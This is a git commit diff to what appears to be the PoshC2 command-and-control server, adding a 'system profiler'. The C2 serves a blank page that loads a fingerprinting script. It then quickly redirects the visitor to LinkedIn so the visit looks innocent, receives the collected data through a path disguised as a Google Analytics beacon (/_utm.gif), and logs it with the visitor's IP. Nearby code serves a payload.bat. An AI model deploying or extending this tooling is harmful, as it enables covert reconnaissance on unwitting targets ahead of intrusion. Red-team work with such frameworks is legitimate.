Addedd System Profiler Feature

2019-05-01 03:51:56 -04:00 · 2019-05-01 03:51:56 -04:00 · 69230d71e0
parent c571088e79
commit 69230d71e0
3 changed files with 44 additions and 4 deletions
--- a/C2Server.py
+++ b/C2Server.py
@ -1,6 +1,6 @@
 #!/usr/bin/env python

-import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal, ssl
+import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal, ssl, urlparse

 from Implant import Implant 
 from Tasks import newTask
@ -9,7 +9,7 @@ from Colours import Colours
 from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all
 from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey
 from Payloads import Payloads
-from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP
+from Config import ROOTDIR, POSHDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP, SYSTEM_PROFILER, SYSTEM_PROFILER_REDIRECT
 from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER
 from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken
 from Config import APIUser, EnableNotifications
@ -62,6 +62,36 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
          s.end_headers()
          s.wfile.write(new_task)

+        elif ("/_utm.gif") in s.path:
+          logs = ""
+          ip_address = ["From: %s" % s.address_string()]          
+          profiler = base64.b64decode(urlparse.parse_qs(s.path)['/_utm.gif?utmje'][0]).split("|") + ip_address
+          logs += "%s visit from: %s" %(s.log_date_time_string(), profiler[0]) + "\n"
+        
+          for profile in profiler[1::]:
+            logs += "\t%s\n" % profile          
+          logs += "\n"
+          
+          open("%ssystem_profiler.log" % ROOTDIR, "a").write(logs)
+          s.send_response(200)
+          s.end_headers()
+          s.wfile.write("")
+
+        elif ("%s_js" % QuickCommandURI) in s.path:
+          filename = "%sFiles/fingerprint.js" % POSHDIR
+          with open(filename, 'rb') as f:
+            content = f.read()
+          s.send_response(200)         
+          s.end_headers()
+          s.wfile.write(content)
+
+        elif (SYSTEM_PROFILER) in s.path:
+          content = """<!DOCTYPE html><html><head><title></title></head><body><noscript>Please enable javascript!</noscript><script type="text/javascript" src="%s/%s_js"></script></body></html>""" % (HostnameIP, QuickCommandURI)
+          s.send_response(200)
+          s.send_header("Refresh","0.3;%s" % SYSTEM_PROFILER_REDIRECT)
+          s.end_headers()
+          s.wfile.write(content)
+
        elif ("%s_bs" % QuickCommandURI) in s.path:
          filename = "%spayload.bat" % (PayloadsDirectory)
          with open(filename, 'rb') as f:
@ -460,6 +490,10 @@ if __name__ == '__main__':
      newPayload.WriteQuickstart(directory + '/quickstart.txt')

    print ("")
+
+    print("SYSTEM PROFILER URL: "+ HostnameIP + SYSTEM_PROFILER)
+    print("SYSTEM PROFILER Log: %ssystem_profiler.log\n" % ROOTDIR)
+       
    print ("CONNECT URL: "+select_item("HostnameIP", "C2Server")+get_newimplanturl() + Colours.GREEN)
    print ("WEBSERVER Log: %swebserver.log" % ROOTDIR)
    KEY = get_baseenckey()
--- a/Config.py
+++ b/Config.py
@ -5,9 +5,11 @@ from UrlConfig import UrlConfig
 HOST_NAME = '0.0.0.0'
 PORT_NUMBER = 443 # This is the bind port

+SYSTEM_PROFILER = "/in"
+SYSTEM_PROFILER_REDIRECT = "https://linkedin.com"
 POSHDIR = "/opt/PoshC2_Python/"
 ROOTDIR = "/opt/PoshC2_Project/"
-HostnameIP = "https://193.36.15.234"
+HostnameIP = "https://192.36.15.234"
 DomainFrontHeader = "" # example df.azureedge.net
 DefaultSleep = "5s"
 Jitter = 0.20
--- a/Files/fingerprint.js
+++ b/Files/fingerprint.js